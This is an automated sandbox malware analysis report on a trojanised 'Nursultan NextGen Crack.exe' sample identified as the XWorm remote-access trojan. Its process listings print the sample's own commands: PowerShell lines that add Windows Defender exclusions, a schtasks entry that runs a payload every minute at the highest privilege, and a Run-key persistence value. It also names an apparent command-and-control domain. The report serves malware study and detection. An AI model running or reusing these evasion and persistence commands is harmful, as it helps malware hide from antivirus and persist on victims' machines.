Malware Analysis Report

2024-09-23 03:39

Sample ID 240625-py935szhpd
Target Nursultan NextGen Crack.exe
SHA256 e766bc3bd8513eadc0d54e511049f1d35bc5c503aeef6cd38aa500d39d66da11
Tags
xworm execution persistence rat trojan discovery evasion privilege_escalation upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e766bc3bd8513eadc0d54e511049f1d35bc5c503aeef6cd38aa500d39d66da11

Threat Level: Known bad

The file Nursultan NextGen Crack.exe was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence rat trojan discovery evasion privilege_escalation upx

Xworm

Detect Xworm Payload

Contains code to disable Windows Defender

Downloads MZ/PE file

Boot or Logon Autostart Execution: Active Setup

Modifies Windows Firewall

Disables Task Manager via registry modification

Disables RegEdit via registry modification

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

UPX packed file

Checks computer location settings

Loads dropped DLL

Enumerates connected drives

Checks installed software on the system

Adds Run key to start application

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Event Triggered Execution: Netsh Helper DLL

Event Triggered Execution: Accessibility Features

Command and Scripting Interpreter: JavaScript

Opens file in notepad (likely ransom note)

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Checks processor information in registry

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: GetForegroundWindowSpam

NTFS ADS

Suspicious use of SetWindowsHookEx

Checks SCSI registry key(s)

Kills process with taskkill

Suspicious behavior: LoadsDriver

Modifies registry class

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-25 12:45

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-25 12:45

Reported

2024-06-25 12:50

Platform

win10v2004-20240508-en

Max time kernel

250s

Max time network

51s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\wininit N/A
N/A N/A C:\Users\Admin\wininit N/A
N/A N/A C:\Users\Admin\wininit N/A
N/A N/A C:\Users\Admin\wininit N/A
N/A N/A C:\Users\Admin\wininit N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\wininit" C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\System32\Notepad.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\wininit N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\wininit N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\wininit N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\wininit N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\wininit N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\Notepad.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3292 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe
PID 3292 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe
PID 3292 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe C:\Windows\system32\cmd.exe
PID 3292 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe C:\Windows\system32\cmd.exe
PID 3188 wrote to memory of 3020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3188 wrote to memory of 3020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3188 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 3188 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2140 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\schtasks.exe
PID 2140 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe C:\Windows\System32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe"

C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe

"C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\и.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\choice.exe

choice /c 12 /n /m "Enter your choice:"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Nursultan NextGen Crack.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\wininit'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wininit'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\Admin\wininit"

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\WatchSplit.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WatchSplit.bat" "

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\MergeRestart.js"

C:\Windows\System32\Notepad.exe

"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\MergeRestart.js

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Users\Admin\wininit

C:\Users\Admin\wininit

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 seems-poet.gl.at.ply.gg udp

Files

C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe

C:\Users\Admin\AppData\Roaming\и.bat

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zfvx4tse.1l4.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wininit.log

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-25 12:45

Reported

2024-06-25 12:53

Platform

win11-20240611-en

Max time kernel

454s

Max time network

471s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A

Disables Task Manager via registry modification

evasion

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\netsh.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\wininit" C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\H: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\W: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\L: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\B: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\M: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\R: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\G: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\S: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\E: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\I: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\X: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\P: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\G: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\K: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\E: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\S: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\I: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\G: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\H: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\J: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\L: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\N: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\K: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\T: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\X: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\X: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\P: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\V: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\O: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\N: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\B: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\W: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\E: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\H: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\A: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\L: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\L: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\P: C:\Windows\SYSTEM32\MsiExec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-shm C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-wal C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-QTQH4.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-2270U.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-5ND24.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\storelib.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-MTDM0.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-DGQ5J.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-8PSUO.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida_update.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-AKF77.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-R2GFH.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-TAAOO.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\afaapi.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-8QQOL.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-2GGC8.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-DAMG5.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-QTSA4.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-9E19P.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-12EMA.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-SEI7M.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-4GVUQ.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-6BD5A.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-S4FOG.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-2GMLC.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\storarc.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-AKDGR.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\ROGAIOSDK.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-E2EJM.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-U7L2M.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-BF063.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-EM1DK.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-T08UO.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-ROQKI.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-DMMUS.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-TKVDT.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-0BDSD.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64help.url C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-SFCO1.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-U9KBU.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida_helper64.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-KJV6M.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-SEMIB.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-J3A05.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.ini C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida_arc.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-DNHR4.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\ssleay32.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\storelibir-2.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\is-5OO5O.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-VL1F3.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida_bench64.dll C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-MJIKG.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File created C:\Program Files (x86)\FinalWire\AIDA64 Extreme\Language\is-EOIJC.tmp C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
File opened for modification C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.url C:\Users\Admin\AppData\Local\Temp\is-L5O71.tmp\aida64extreme730.tmp N/A
